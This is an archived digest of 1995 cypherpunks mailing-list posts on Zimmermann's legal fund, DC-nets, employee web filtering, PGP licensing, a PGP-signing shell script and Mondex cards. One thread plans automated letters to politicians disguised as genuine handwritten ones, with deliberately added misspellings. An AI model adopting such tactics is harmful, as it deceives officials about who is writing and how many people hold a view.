From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Mon, 17 Jul 95 22:45:09 PDT
To: nsb@fv.com
Subject: Zimmerman legal fund
Message-ID: <199507180545.HAA13402@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



I just received a bit of mail asking about the Zimmermann Legal
Defense Fund, which, like many folks out there, I support.  The writer
implied that he might give money because I suggest it in my sig, but
expressed questions about its legitamacy, and questioned if it's "just
someone trying to exploit the Zimmerman case"

Could someone in the know talk about the relationship between FV and
the ZLDF? I don't like to spread misinformation, so I won't answer
based on conjectures.



From owner-cypherpunks  Mon Jul 17 23:56:55 1995
Return-Path: <owner-cypherpunks>
Received: by toad.com id AA01689; Mon, 17 Jul 95 23:56:55 PDT



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hoz@univel.telescan.com (rick hoselton)
Date: Tue, 18 Jul 95 08:01:38 PDT
To: anon-remailer@utopia.hacktic.nl (Anonymous)
Subject: Re: Zimmerman legal fund
Message-ID: <9507181501.AA11591@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>
>I just received a bit of mail asking about the Zimmermann Legal
>Defense Fund, which, like many folks out there, I support.  The writer
>implied that he might give money because I suggest it in my sig, but
>expressed questions about its legitamacy, and questioned if it's "just
>someone trying to exploit the Zimmerman case"
>
>Could someone in the know talk about the relationship between FV and
>the ZLDF? I don't like to spread misinformation, so I won't answer
>based on conjectures.
>


I had similar concerns last month, so I emailed the following to 
csn.net!dubois ("Philip L. Dubois")

> 
> Could you please inform me of the financial status of the fund 
> raising for the Phil Zimmerman case?  How much money has been 
> collected, and how much has been spent, and what are the future 
> anticipated expenses?  I might like to contribute, but "a normally 
> unreliable source" has claimed to me that something on the order of 
> $50,000 has been spent, and there is not even an indictment yet.  
> Is this true and is this reasonable?  Is it true that some/all of
> his legal services are being done "pro bono" (I hope I got that phrase
> correct, maybe I should just say "for free")
> 
> If you choose to reply, may I have permission to make your reply public?
> 
> Rick F. Hoselton  (who doesn't claim to present opinions for others)
> 


I got back the following reply:
> 

>Mr. Hoselton--
>
>Since the government has not yet decided whether to indict Mr. Zimmermann,
or at least hasn't >told us its decision if it has made one, we continue to
accept donations to the Zimmermann >Legal Defense Fund.  I've never added up
the total amount of all donations to date, but I >doubt that it would be in
the neighborhood of $50,000.  I can tell you that several lawyers >have been
working on the case and that all of them but me have done so pro bono, which
means >that they have not been paid.  Since I have been lead counsel and
have therefore had primary >responsibility for the defense, I have not been
pro bono, at least not entirely; I have not >billed for much of my time.  We
have no way of knowing how long this case will go on.  The >government could
tell us today that it won't indict, in which case it will be all over, or it
>could indict very soon, or it could do nothing until June of 1996 when the
statute of >limitations expires.  
>
>You have my permission to make my reply public.
>
>Philip L. Dubois
>Counsel for Philip Zimmermann
>
Rick F. Hoselton  (who doesn't claim to present opinions for others)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an250888@anon.penet.fi
Date: Tue, 18 Jul 95 02:14:42 PDT
To: cypherpunks@toad.com
Subject: Re: "Judgement Proof" and Putting Up or Shutting Up
Message-ID: <9507180840.AA14290@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


>> >and, conspiracy theories non-withstanding, we the people do not govern 
>> >America --we are only given a short list of politicians who have sold 
>> >their soul to CFR's satanist inner circle.
>> 
>> What's CFR?
>> 
>
>Council on Foreign Relations.

or Code of Federal Regulations.

----------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
If you reply to this message, your message WILL be *automatically* anonymized
and you are allocated an anon id. Read the help file to prevent this.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Tue, 18 Jul 95 06:12:25 PDT
To: greg@ideath.goldenbear.com (Greg Broiles)
Subject: Re: SurfWatch for employees (ugh)
In-Reply-To: <199507180636.AA02056@ideath.goldenbear.com>
Message-ID: <199507181311.JAA06412@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain


I don't think there is ever anything wrong with employeer's
restricting what employee's do on any legal or ethical level.
Evolution (a la Bionomics) will sort out the winners and losers.

/hawk


> or "only to these sites". The product also can be configured to log all 
> Web usage by users subjected to its reign of terror. :) WebTrack 


> are always appropriate, and indeed empowering. Neither WebTrack nor






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Tue, 18 Jul 95 09:28:07 PDT
To: ab411@detroit.freenet.org
Subject: Re: Automated Rant Generators and Letter Generators
Message-ID: <ac312fb403021004f23b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



David Conrad told me he meant for this to go to the whole list, but only
sent it to me by mistake. So here is his post.


At 4:14 PM 7/18/95, David R. Conrad wrote:
>Tim May <tcmay@sensemedia.net> writes:
>>Bart's comments about using Knuth's typographic work are interesting, to
>>the extent that letters need to look handwritten. In the Mac market, it's
>>possible to send in some handwriting samples and get back a font that
>>emulates the handwriting!
>
>I suppose the resulting font has only one form for each letter?  (Although
>I understand that when you send them a sample, you send several instances
>of each letter; a friend was showing me an add for this.)  The fact that
>each letter is the same every time would be a giveaway.  We need something
>like Metafont, or at least choose from a number of different shapes.
>
>>                                                 ... So, the combination of
>>handwriting fonts, automated rant generators (of varying rabidities), and
>>fax capabilities gives a pretty good start. Using lots of handwriting
>>samples, various other fonts, and a mix of styles in the letters will help.
>
>Another factor that would make it appear more authentic would be spelling
>and grammar errors.  The grammar errors could be built into the rant
>generators (an occasional dangling modifier, an incomplete sentence or two);
>spelling errors could be done by post-processing the output of the rantgens.
>It's important to take into account the different types of spellos that
>occur: commonly misspelled words (aquired, beleive); wrong homophone (their,
>they're, there; two, to, too); transposed letters (transpoesd); near-misses
>on qwerty keyboards (nesr-mosses); and words left out.
>
>--
>David R. Conrad, ab411@detroit.freenet.org, http://web.grfn.org/~conrad/
>Finger conrad@grfn.org for PGP 2.6 public key; it's also on my home page
>Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
>No, his mind is not for rent to any god or government.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@voxbox.norden1.com (Jim Grubs, W8GRT)
Date: Tue, 18 Jul 95 06:54:02 PDT
To: cypherpunks@toad.com
Subject: Is it legal for commercial companies to use PGP?
Message-ID: <5ZsF9c6w165w@voxbox.norden1.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

jgrubs@voxbox.norden1.com (Jim Grubs, W8GRT) writes:

> As I recall, the following is a correct scenario: a customer can use PGP to
> send credit card numbers to a vendor he's making a personal purchase from,
> but the vendor must use Viacrypt. If the customer is buying something to use
> for business, BOTH  must use Viacrypt.

In practice, I'd probably buy Viacrypt for legal reasons but use PGP anyway.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: http://norden1.com/~jim/sylvania.html

iQCVAwUBMAu5iN74r4kaz3mVAQF11QQAiNccy69sb5OA1jmOpErqqZNJ4sNx3smW
tAJQ3lD1op4qlPIO48vxwkvr+IaQyyOkf797+9Ca1z9WtxgwSamo32BQnPQZ6Pbm
Vipmpwrabrxq67TOrGgxNp3UN7oBZl3eyad0hIj6ENzs8u1wi3wkHUV/3z341XB7
u953orkOZSk=
=UYrt
-----END PGP SIGNATURE-----

--
                        WebCasters(tm)
James C. Grubs                         jgrubs@voxbox.norden1.com
6817 Maplewood Avenue                         Tel.: 419-882-2697
Sylvania, Oh 43560                             Fax: 419-885-2814
   Internet consulting, HTML programing, Information brokering
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Date: Tue, 18 Jul 95 08:38:04 PDT
To: cypherpunks@toad.com
Subject: Re: Here it is; bi-directional dining cryptographers
In-Reply-To: <199507180649.XAA25418@ix3.ix.netcom.com>
Message-ID: <199507181537.JAA28073@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> Since anybody can send bits at any time, and nobody can tell who without
> lots of collusion, you can't prevent denial-of-service (well, I assume not,
> unless there's something rather non-obvious in the literature.)


Chaum discusses it a lot in his original DC paper.  In the limit, any
disrupter can be ousted from the Net.  What you do is "trap" the disrupter
by getting all ready to speak and then not saying anything.  (The only reason
that you do not say anything is that you are about to reveal your secret
bits, and anything you say will be traceable to you.  If you don't mind 
getting identified with your words this once then go ahead.)  The disrupter
foolishly blurts out some garbage at that instant and then everyone holds
up their secret bits to see who "lied" about their XOR (who inverted their
output when they weren't supposed to.)
  Of course if all but one or two participants are colluding disrupters
then it will probably be the one or two who are ousted instead of the
disrupters!  But this is sort of the same effect, no?


This presupposes a block-scheduling algorithm, or at least a set-up in which
the disrupter is committed to his output *before* he realizes that his
intended victim is not transmitting.


Are you familiar with the topology of DC-nets-- how anonymity is preserved
relative to two participants as long as there is a "path" of shared bits
between them?  (That is, A shares with B who shares with C, now A and C are
anonymous relative to each other.  Of course if B decides to out them, 
then they are high and dry.  The interesting thing is that if A and C both
start sharing with D, then C is no longer capable of outting them unless he
collaborates with D.)  The result is that each individual participant in a
DC net can increase their level of security just by sharing with a new
partner.  (Of course, if that new guy is a tentacle of the "anti-anon" 
colluders, then the individual has not actually increased their security.
But they have not decreased it either.)

I really like that about DC-net topology--  any two participants can elect
to boost their anonymity-level without needing the other participants'
permission and without increasing the workload on the other participants.


Bryce
signatures follow

    /=============------------        Our e-mail should be
     Bryce Wilcox,  Programmer          Between you and me
     bryce.wilcox@colorado.edu            For "pretty good privacy"
     ------------=============/             Use PGP!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBMAvVWJCUT4gUihHlAQGsyQP+IgY/hHMGtj7kYj3eiIVSoSaAkDOPeNYS
YnPLSahNfGPKtd8cOyX4QXlrBKVSUgJS3hrAFxSGspIl36YOFSLloFNK73lk7DaU
JJmfISWJg8nYWzURpNc/VJkcI9u5u30izD5VVUOFXX0jRohBYxjdUFmaLOlY1vu7
1/xVNHCVhZo=
=FIjz
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Tue, 18 Jul 95 06:46:32 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: WebTrack URL/Contact Info
Message-ID: <9507181346.AA21915@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


The WWW site for Webster Network Strategies and its WebTrack software is
http://www.webster.com/

According to that page:

   How to reach us: 

   E-mail info@webster.com 
   Call (941) 261-5503 
   Fax (941) 261-6549 
   Write to WNS, 1100 5th Avenue South, Suite 308, Naples, FL
   33940 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@voxbox.norden1.com (Jim Grubs, W8GRT)
Date: Tue, 18 Jul 95 06:54:01 PDT
To: cypherpunks@toad.com
Subject: SurfWatch for employees (ugh)
Message-ID: <sgTF9c7w165w@voxbox.norden1.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Greg Broiles <greg@ideath.goldenbear.com> writes:

> Consistent with the trend towards treating employees like children,
> Webster Network Strategies has announced (but apparently has not
> shipped) a product similar to SurfWatch but aimed at an employment
> environment. The product is called "WebTrack" and supposedly supports

Forcing workers to keep their minds on their work? Shameful...


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: http://norden1.com/~jim/sylvania.html

iQCVAwUBMAu7mN74r4kaz3mVAQEWhgP9FDkAtsbPMVk5/FTCGaImFu7Iqllw0Y55
Rv2gXxVdiYKmK449i1+PQhJvpnLJE5qVRqMeCjhcysrbI/WK9RUDP+6FVenfDjWZ
Kxh385qzNWE1sJTv92ii3g4dbIp7yziePJc9ZH6HqZ9i1MAyQfjEPutNcE5xgLSH
hBUYN0Q1cPE=
=l0BB
-----END PGP SIGNATURE-----

--
                        WebCasters(tm)
James C. Grubs                         jgrubs@voxbox.norden1.com
6817 Maplewood Avenue                         Tel.: 419-882-2697
Sylvania, Oh 43560                             Fax: 419-885-2814
   Internet consulting, HTML programing, Information brokering
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bart@netcom.com (Harry Bartholomew)
Date: Tue, 18 Jul 95 10:00:48 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: Automated Rant Generators and Letter Generators
In-Reply-To: <ac312fb403021004f23b@[205.199.118.202]>
Message-ID: <199507181659.JAA10311@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



    My motivation in suggesting the use of a pen-plotter to generate
    output was to make the letter appear to come from a flesh and
    blood human who doesn't do computers or even FAX.  Somewhere,
    perhaps from Jim Warren or the EFF, I had heard that the pols
    payed attention to handwritten letters far more than FAXs or
    email or phone calls.  The rant generator-to-postal mail gateway
    might give netters more leverage than we have now.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Tue, 18 Jul 95 07:24:11 PDT
To: bal@martigny.ai.mit.edu
Subject: Re: S. 982 Kyl-Leahy(-Grassley) NII Protection Act
In-Reply-To: <199507180318.UAA16624@comsec.com>
Message-ID: <9507181418.AA15335@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


I read it and it looks OK -- except, as I said in e-mail to Senators Kyl
and Leahy, we can't let ourselves believe that legislation can keep
computers safe from hackers.  Many of these threats are outside the reach
of US law.  Instead, we need good firewalls, encrypting file systems, etc.

 - Carl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 18 Jul 95 07:21:23 PDT
To: cypherpunks@toad.com
Subject: AYN_ran
Message-ID: <199507181421.KAA00235@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New Yorker, July 24, 1995:


   "Twilight of the Goddess." A critical look at Ayn Rand and
   her work.

      Thirteen years after Rand's death, her books still sell
      more than three hundred thousand copies a year. Not
      since the popular novels of almost a century before,
      bent on refutations of Darwin or God, and offering what
      George Eliot called "a complete theory of life and
      manual of divinity, in a love story," had there appeared
      so vividly accessible and reassuring a guide for the
      cosmically perplexed. As late as 1991, the Library of
      Congress found that a majority of Americans surveyed
      named "Atlas Shrugged" as the book that had most
      influenced their lives, after the Bible.



   AYN_ran   [About 57K, in three parts]










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei>
Date: Tue, 18 Jul 95 07:25:52 PDT
To: cypherpunks@toad.com
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <9507181425.AA10035@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



> I remember one of the sponsors of the CDA ranting about pornographers
> "profiteering" from pornographic images on the Internet, blissfully unaware
> that stuff downloaded from alt.sex.binaries.insert.your.fetish.here doesn't
> profit anyone but the phone company (for the hours you stay online to get
> it).

I called up Exon's press secretary and asked him about this. He 
claimed that BBS's were uploading advertisments to the Net, and this
was the 'profiteering' referred to. He was immune to reason on this,
and felt that the CMU 'study' was rigorous.

It's true that a some of the pics in those groups include stamped-in
BBS names and phone numbers, but my impression was always that this
was the BBS operators trying to do a little damage control - so that
when random users post their pix (on which they claim copyright, 
ignoring the fact that most of their scans rip off magazine 
publishers), they can recognize the 'piracy', and also earn a little
publicity.

For a good backgrounder on the story, check 
http://www.cybernothing.org/cno/reports/cyberporn.html

Peter Trei
ptrei@acm.org
 

Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 18 Jul 95 09:07:31 PDT
To: merriman@arn.net (David K. Merriman)
Subject: Re:  Free The World Web Server project.. :)
Message-ID: <199507181508.LAA22050@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:10 PM 7/16/95 -0500, David K. Merriman wrote:
>>  The web page would generate a random letter, allow the user to edit
>>it, further (possibly offering the alternate phrases) before he clicks
>>on the [Send] button.
>>
>
>If someone in the DC area wants to set up such a system, I'll gladly donate
>an Intel SatisFAXion 200 fax/modem, complete with manuals, etc.
>
>This would be a Good Thing, IMHO.

The "Experiment in Remote Printing" had this idea about two years ago.  They
have well established, free, email to fax gateways around the world (including 
DC).

See their WWW page: 

http://www.dis.org/fax/faxsend.html

DCF

"And that is called paying the Dane-geld;
But weve proved it again and again,
That if once you have paid him the Dane-geld
You never get rid of the Dane." Rudyard Kipling




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rmtodd@servalan.servalan.com (Richard Todd)
Date: Tue, 18 Jul 95 11:03:53 PDT
To: cypherpunks@toad.com
Subject: Re: SurfWatch for employees (ugh)
In-Reply-To: <199507180636.AA02056@ideath.goldenbear.com>
Message-ID: <m0sYGIp-00076GC@servalan.servalan.com>
MIME-Version: 1.0
Content-Type: text/plain


In servalan.mailinglist.cypherpunks Greg Broiles writes:

>-----BEGIN PGP SIGNED MESSAGE-----

>Web usage by users subjected to its reign of terror. :) WebTrack 
>is priced at $7,500 with an annual subscription to its list of 
>interesting (err, forbidden) sites priced at $1,500. The article in the

Bwahahahahaha.  You gotta admire them for sheer marketing chutzpah. 
Any internet-connected company is likely to have a firewall, with all WWW
access going thru a proxy on the firewall, and if I remember correctly, the
CERN proxy httpd can be set to deny access to whichever URLs you want; I 
suspect the other proxy httpds have similar features.  It takes hellacious
chutzpah to ask $7,500 for software that does what you can get for
free just by ftping to CERN's archives.  Barnum's principle does imply that
they'll probably find a buyer, though...

As for the wider issues involved in using this in a commercial setting, I'll
merely note that any corporation that treats its employees like children
will end up with only employees with the mental age of children.  This could
explain why much of the commercial software I see these days acts like it
was designed by a committee of retarded 10-year-olds.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Tue, 18 Jul 95 10:48:26 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: PINESIGN 2.0: A simple script for PGP signing Pine mail
Message-ID: <Pine.ULT.3.91.950718122839.11131E-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

After a couple of comments, I've updated Pinesign to a new version.  This 
new version adds the ability to choose whether your ascii signature (ie 
$HOME/.signature) is added.  Some mail servers get confused by extra 
text, so the ability to make sure nothing extra is added was requested.

Basically, if you want to sign the message both digitally and asciilly 
(is that a word :-), just press return twice after you exit your composing 
editor.  Otherwise, make the selections you want specific to the type of 
message you are sending.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

#!/bin/sh

# PINESIGN v2.0
# Written by:  Robert A. Hayden <hayden@krypton.mankato.msus.edu>

# PINESIGN is a simple program that will allow you to automatically sign 
# your email and news messages composed with the Pine 3.89 mail reader.  It 
# may also work with other mail and news programs, but it has not been 
# tested.

# INSTRUCTIONS FOR CONFIGURING PINE
# 
# You need to define the following options in Pine.  This can be done 
# either via the SETUP options in the main menu of Pine, or via editing 
# the .pinerc. 
#
# 	A)	signature-file=" "  (an empty space)
#	B)	enable-alternate-editor-cmd
#	C)	enable-alternate-editor-implicitly (optional but recommended)
#	D) 	signature-at-bottom
#	E)	editor=<exact path to this script>

# INSTRUCTIONS FOR CONFIGURING PINESIGN
#
# The PGP program must be in your path, and the PGPPATH environment 
# variable must be defined.  See the PGP documentation for details.
#
# Double check that the first line of this program points to sh. 
#
# Edit the SIGPATH and PINEEDITOR variables to point at your signature 
# (if any) and the editor you wish to use for your Pine mail.  Default 
# signature will be the file .signature in your $HOME directory.  
# Default editor is pico -z -t.

SIGPATH=$HOME/.signature-pine
PINEEDITOR='pico -z -t'

# INSTRUCTIONS FOR USING PINESIGN
#
# When you compose a message, you will compose your message as normal.  
#
# When you exit your editor (control-X in Pico), you will receive a prompt 
# asking if you wish to add your signature file to the message.  If you 
# respond with y, Y or just press return, your text signature file (often 
# $HOME/.signature) will be appended to your message.  If you type  
# anything else, your message will not have your signature added.
#
# Next, you will be prompted as to whether you wish to PGP sign your
# message.  If you answer with y, Y or return, you will be prompted for your
# PGP passphrase and then dumped back to the address/subject section of
# Pine.  If you type anything else, your message will not be signed.  
#
# If you selected it to be added, your .signature file will be appended 
# AFTER your digital signature. 
#
# If you have not defined your alternate editor to be run implicitly, you 
# will need to start it manually.  If you do not run the alternate editor,
# your .signature file will not be appended and you will also have to do
# that manually.  It is highly recommended that your define your alternate
# editor to run implicitly. 

### DO NOT EDIT ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU ARE DOING ###

$PINEEDITOR $1

clear
echo -n "Would you like to add your ASCII signature to this message? [y] " 
read SIG
echo " "
echo -n "Would you like to sign this message with your PGP signature? [y] "
read PGP

if [ "$PGP" = "y" ]
	then 
		pgp -sat +comment="PGP Signed with PineSign 2.0" $1
		mv $1.asc $1
fi

if [ "$PGP" = "Y" ]
	then 
		pgp -sat +comment="PGP Signed with PineSign 2.0" $1
		mv $1.asc $1
fi

if [ "$PGP" = "" ]
	then 
		pgp -sat +comment="PGP Signed with PineSign 2.0" $1
		mv $1.asc $1
fi

if [ "$SIG" = "y" ]
	then 
		echo " " >> $1
		cat $SIGPATH >> $1
fi

if [ "$SIG" = "Y" ]
	then 
		echo " " >> $1
		cat $SIGPATH >> $1
fi

if [ "$SIG" = "" ]
	then 
		echo " " >> $1
		cat $SIGPATH >> $1
fi



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.0

iQCVAwUBMAvz9DokqlyVGmCFAQHq6QP9FztYKCL9lV16HWwY3E6bRzyfpqwoqCag
o7hvWivmc81uocYzo54fR5sz0pLCOAIAJL6f0ST+cRM/epdfgn/eEovCDQFZXelB
0I9mmhaUVpUdHFGfw8UD0XhuBuPWbsaNbMfYr07IVEddH8zqOKHANG0QLBmc8aVm
6btQbK8/MWE=
=wfGX
-----END PGP SIGNATURE-----
 
____        Robert A. Hayden      <=> Cthulhu Matata
\  /__          -=-=-=-=-         <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info <=> hayden@krypton.mankato.msus.edu
   \/   Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <Michael@umlaw.demon.co.uk>
Date: Tue, 18 Jul 95 10:27:54 PDT
To: liberty@gate.net
Subject: Re: Root Causes Roots
Message-ID: <2482@umlaw.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Jim Ray asks what on earth I'm talking about the 9th amendment
not applying to the right to write code, since people were using 
codes to protect their communications long before the passage of 
the bill of rights.

I always understood "writing code" as in "cypherpuks write code" 
to mean computer code, that is FORTRAN, C++, assembler, perl or 
whatever.  I understand "writing IN code" to be the use of 
cryptographic tools such as codes or cyphers.  Thus my claim 
that the right to write IN code may have existed in the 1790s, 
but the right to write [computer] code could not (since there 
were no computers).   Of course, I could be wrong about this, 
since however you define it, it's debateable whether I'd pass the
code test to qualify as a cypherpunk, since I stopped writing 
code when I gave up programming for lawyering, and I didn't start 
writing in code when I started writing about codes.

In any case it's a matter of definitions, not timelines.

Note: I am not suggesting that the right to write code lacks 
constitutional protection; just that the protection wouldn't 
come from the 9th amendment.  My views on the constitutional 
right to write IN code, which also does not rely on the 9th 
amendment, can be found in my Clipper paper, which Hal Abelson 
has kindly ported in Netscape friendly form to:

http://

-- 
Michael Froomkin                   until Aug 6: michael@umlaw.demon.co.uk
U.Miami School of Law                                     London, England
mfroomki@umiami.ir.miami.edu <-- this will still find me
PO Box 248087 Coral Gables, FL 33124-8087     Rain. Sun. Rain. Sun. Rain.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: terrell@sam.neosoft.com (Buford Terrell)
Date: Tue, 18 Jul 95 11:27:29 PDT
To: cypherpunks@toad.com
Subject: Re: "Judgement Proof" and Putting Up or Shutting Up
Message-ID: <199507181832.NAA27559@sam.neosoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>
>>> >and, conspiracy theories non-withstanding, we the people do not govern 
>>> >America --we are only given a short list of politicians who have sold 
>>> >their soul to CFR's satanist inner circle.
>>> 
>>> What's CFR?
>>> 
>>
>>Council on Foreign Relations.
>
>or Code of Federal Regulations.
>
or Cupherpunks Fuming and Ranting
  
  --buford





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sbryan@maroon.tc.umn.edu (Steve Bryan)
Date: Tue, 18 Jul 95 12:50:18 PDT
To: Greg Broiles <cypherpunks@toad.com
Subject: Re: SurfWatch for employees (ugh)
Message-ID: <v02110100ac31724f6c1a@[134.84.101.130]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:36 pm 7/17/95, Greg Broiles wrote:

[snip]
>(Pedants need not point out that personal choice (and personal filtering)
>are always appropriate, and indeed empowering. Neither WebTrack nor
>NetSurf are marketed to help people subject themselves to a regime
>of repression - they are intended and sold to allow the purchaser to
>control what others (perceived as having fewer or no rights) will read
[snip]

There doesn't seem to be any suggestion that an employer will attempt to control net access that you pay and use yourself with your own equipment. What's the problem? As far as net access from work, that will naturally sort itself out. If unfettered access is beneficial to an enterprise then that will become apparent as "repressive" companies prove incapable of competing with "permissive" companies.

+----------------------------------------------------------------------
|Steve Bryan                Internet: sbryan@maroon.tc.umn.edu
|Sexton Software          CompuServe: 76545,527
|Minneapolis, MN 55415           Fax: (612) 929-1799
|PGP key fingerprint: B4 C6 E2 A6 5F 87 57 7D  E1 8C A6 9B A9 BE 96 CB
+----------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 18 Jul 95 11:51:21 PDT
To: banisar@epic.org (Dave Banisar)
Subject: Re: A Chronology on crypto bans
Message-ID: <199507181850.OAA16134@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:08 PM 7/16/95 -0400, Dave Banisar wrote:

>Attempts to ban encryption 1977-1995
>
>1977-1980 NSA Director Inman calls crypto born secret. Should be restricted.
>Attempts to use Invention Secrecy Act of 1951 to patent inventions by
>academic researchers. Attempts to use export control laws to limit
>scientific discussion.

>NSA Threatens NSF over grants for crypto studies.

I hope that you emphasize the big impact of the IEEE/MIT/Scientific American/NSA/"A Proposal for a Public Key Encryption System" flap of 1978(?).

An awful lot of people first learned about public-key/private-key algorithms because of that fight.

DCF

"You men can't fight in here.  This is the War Room." -- Dr. Strangelove (or How I Learned to Stop Worrying and Love the Bomb).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Tue, 18 Jul 95 07:06:32 PDT
To: cypherpunks@toad.com
Subject: Mondex (forward)
Message-ID: <Pine.3.89.9507181524.A3308-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



Thought this might be of interest... forwarded with permission..

From Andy Meredith (meredith@bcs.org.uk) on the ecm list :

On Jul 18,  9:21am, Marcel van der Peijl wrote:
> Subject: Re: e$, c$$$, Cyberbucks & ECash - terminology.
> > > electronic cash (also digital cash) is a general term for
> > > the concept of encrypted messages that have inherent  value
> > > - as opposed to credit notes or electronic checks. I guess
> > > that the Mondex smart cards have ecash in them, but that
> > > seems different.
>
> I am such a bad reader! You are right. This is a good definition
> of  electronic cash or digital cash. Mondex is questionable. The
> card has an account, and uses crypto to proof it is a real Mondex
> card, so you'd better believe it when it says it took the money
> of it's internal balance. I would vote this is not digital cash.

I am participating in the Mondex pilot scheme in Swindon. It took me
a great deal of pushing to get _any_ details at all. The details I
did get didn't go into the encryption schemes used or any such fun
stuff. It did in fact take quite a while for me to realise the
significant differences between ecash and Mondex. As they didn't, in
the end, make me sign an NDA, I guess I can share.

1 - The Value is not encrypted on the card, that is held as plain
    text, it is the front door on the card that is heavily guarded.

    If therefore you can inject value into the card from the back
    door, it is then taken as real money. The logic being; Hey it
    managed to get through all that security which is imposible for
    anything except another mondex card to do, it must therefore be
    Mondex money ... that's Ok then.

    There can never be a software only version of Mondex
    as it stands. The trust is in the front door, not the cash
    values themselves.

2 - Some of their transaction monitoring is very "Big Brother"esque.
    As you can imagine, if a card is seen to be creating money but
    not consuming it, there IS a problem. Therefore whenever you get
    some money from a "hole in the wall", the bank sucks over your
    transaction log & error log. It will of course only ever use
    this for security monitoring. It will never follow the likes of
    AMEX and start stock pilling these transactions, using it's
    knowledge of the which physical entity own what card ID, and
    using the cross reference for market research/direct
mail/consumer
    profiling. No of course not. That would be TOTALLY unethical ...

3 - Mondex is billed as "Electronic Cash", but you won't find the
    concept of anonymity in there anywhere. They talk about it, but
    I haven't seen them write it down explicitly. One could suggest
    however that that "Cash == Anonymous", so the scheme would have
    to be anonymous for them to have a right to the "Electronic
    Cash" title.

> So what is the name for schemes like this?

How about "Stored Value Card"

>-- End of excerpt from Marcel van der Peijl

One interesting thing that I noted. When I read through the technical
blerb on ecash a while back, I had to sit back and think very
clearly, and read very slowly. However, it was relatively easy to
understand the bits, and then even easier to put the bits together
into a system.

The reason, I suggest, is that if you understood all the encryption
technology behind ecash, and had the requirements that it has for
anonymity and security (hand in hand). You would reinvent ecash.
Maybe the layering would be subtly different, the real one ond your
independant derivative wouldn't interact, but ...

If however you were to have asked me to explain ecash a week later, I
